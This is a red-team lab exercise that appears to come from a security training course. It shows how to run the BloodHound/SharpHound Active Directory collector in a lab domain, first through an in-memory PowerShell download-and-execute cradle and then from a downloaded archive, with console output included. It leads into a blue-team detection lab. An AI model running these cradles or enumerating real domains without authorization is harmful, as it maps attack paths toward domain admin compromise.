L1120-Red BloodHound and SharpHound
The BloodHound tools are based in part on the Active Directory Control Paths project. The toolkit enumerates a wide array of information available from Active Directory. Coupled with the Neo4j interface, this is an incredible tool with varied implications for both blue and red teams. From a red team perspective, the BloodHound toolkit can assist a tester with visually mapping the fastest paths to a domain admin or other specific high-interest target. Blue teams can use this tool to keep an eye on paths, privileged sessions, account usage, group membership, and more.
- Import and execute a BloodHound PowerShell script.
Import and execute Bloodhound, an enumeration script that will gather information about Active Directory. Search for the execution of the script in the Optics Infrastructure.
Invoke BloodHound from Memory
Login to Member Server
Connect via Remote Desktop to the Member Server, WS01.
- If you are already connected, use the current session.
- See Lab L0200 for connection instructions.
PowerShell
Launch Windows PowerShell from the Windows Start Menu.
- See Lab L0250 for instruction on launching PowerShell.
Confirm User Context
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
Execute BloodHound From Internet
The next group of commands will download a PowerShell Script from the internet and load it directly into memory and allow it to be executed.
- The first command creates a memory cradle and “installs” the SharpHound module.
- The last command runs the toolkit.
- Enumeration of privileged groups should get caught (event ID 4798 or 4799)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1')
Invoke-BloodHound
PS C:\Users\itadmin> IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1')
PS C:\Users\itadmin> Invoke-BloodHound
-----------------------------------------------
Initializing SharpHound at 6:45 AM on 6/28/2020
-----------------------------------------------
Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain LABS.LOCAL using path CN=Schema,CN=Configuration,DC=LABS,DC=LOCAL
PS C:\Users\itadmin> [+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 84 MB RAM
Status: 277 objects finished (+277 277)/s -- Using 113 MB RAM
Enumeration finished in 00:00:01.1059298
Compressing data to C:\Users\itadmin\20200628064526_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 6:45 AM on 6/28/2020! Happy Graphing!
With the SharpHound tool completed, move on to the next step of this lab.
Execute BloodHound From Disk
Download, extract, and execute the BloodHoundAD data collector via powershell
Login to Member Server
Connect via Remote Desktop to the Member Server, WS01.
- If you are already connected, use the current session.
- See Lab L0200 for connection instructions.
PowerShell
Launch Windows PowerShell from the Windows Start Menu.
- See Lab L0250 for instruction on launching PowerShell.
Confirm User Context
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
Bloodhound From Disk
From the PowerShell console, we allow TLS1.2, download the BloodHound release archive from GitHub, expand the archive, import the PowerShell module, and lastly Invoke-Bloodhound.
$ProgressPreference = 'SilentlyContinue'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest –URI https://github.com/BloodHoundAD/BloodHound/archive/master.zip -OutFile "master.zip"
Expand-Archive master.zip
Import-Module .\master\BloodHound-master\Collectors\SharpHound.ps1
Invoke-BloodHound
-----------------------------------------------
Initializing SharpHound at 7:01 AM on 6/28/2020
-----------------------------------------------
Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain LABS.LOCAL using path CN=Schema,CN=Configuration,DC=LABS,DC=LOCAL
PS C:\Users\itadmin> [+] Cache File Found! Loaded 521 Objects in cache
PS C:\Users\itadmin>
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 103 MB RAM
Status: 277 objects finished (+277 ∞)/s -- Using 110 MB RAM
Enumeration finished in 00:00:00.5343055
Compressing data to C:\Users\itadmin\20200628070125_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 7:01 AM on 6/28/2020! Happy Graphing!
Having completed Invoking the BloodHound ingestors with two different methods, lets look at hunting for these activities.
Continue on to L1120-Blue
